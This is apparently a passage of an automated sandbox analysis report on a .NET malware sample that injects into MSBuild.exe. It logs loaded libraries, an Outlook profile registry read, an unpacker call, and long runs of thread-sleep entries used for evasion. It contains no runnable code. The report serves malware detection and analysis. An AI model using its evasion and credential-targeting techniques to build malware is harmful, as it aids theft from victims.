Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: R86BRY7DdC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: R86BRY7DdC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: R86BRY7DdC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\Administrator\Desktop\Outputs\Abhekiso.pdb source: R86BRY7DdC.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: R86BRY7DdC.exe, PreventFromWeb.cs

.Net Code: FOBDestination System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory allocated: C30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Memory allocated: 1A800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 31D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 33B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 3220000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599016	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596624	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596395	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594438	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1265			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 8596			Jump to behavior

Source: C:\Users\user\Desktop\R86BRY7DdC.exe TID: 5568	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6696	Thread sleep count: 1265 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6696	Thread sleep count: 8596 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -599016s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596624s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596395s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6640	Thread sleep time: -594547s >= -30000s	Jump to behavior
